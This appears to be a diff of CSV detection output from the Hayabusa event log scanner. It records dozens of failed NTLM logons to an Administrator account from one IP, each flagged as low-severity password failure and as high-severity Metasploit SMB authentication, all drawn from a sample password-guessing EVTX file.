+2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RuYihjQpt76foAW3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OlPm2vRh9EHN9J6n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n9jDy3NDDPe7XgyW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AtGxqEKOoP6W3w0Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BLqYztXwV80UBez1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C0yki1dEFZrnMLs2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jbE2z1W1wQgoTDso  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IJmZFXFxiLuWWkMC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x9EPwprgXSJNUFfg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h0ZjYxZ8K5m5F1vo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xSw7OjDv8ldqbm5T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mk0BAdOI210HwPhX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wSwWz57Kvl2XJVUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DLcfSrHT5bSsNnuQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rQDkbESps0PXWEUT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZpnyzkXasuyAtdn1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ps9IqJzTliJvzpIS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V7PLb2uRTIY8t123  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sHAJ9p0QbSRxhvtk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YRiE1wGrwWAx0feP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Flo4bCVjmlaHz0QS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HscUujSzd3Ua7dqg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aIQPTx67aEer51wb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MqUoXUf7PKIaoDjs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wzeB4DAS1W633tmh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UTtXTrqHoCZMbDLT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4HVv5PgPhiDW3qcj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g21VoO45UrIbTuZO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rGpD7AJUTekDmd6Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OykzTOn7B9THv0cT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cIYOrBBwX8nFpCzw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SvnROHLMVnmPfAyy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5EwJ84H7kXQXzGZz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 34RLeLWDgLayU3JM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QaXHGUgboODAi5Qu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QlOlZ0m397CsmaeD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N24rSPCI8DsQIPXR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5y2tgoUcs6mFPZm4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HmFX6MioYqaMumgw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R4HRWlPWPKy1Cicq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GDUf7wVbHkS9uaPC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eBX0Lviz6Bv5rGcb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zZwPm9qahLU78FRY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jOVsopykTHNQcYUp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n8DY7sdDY8nuWdME  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rTxEVu7mudXEBARZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
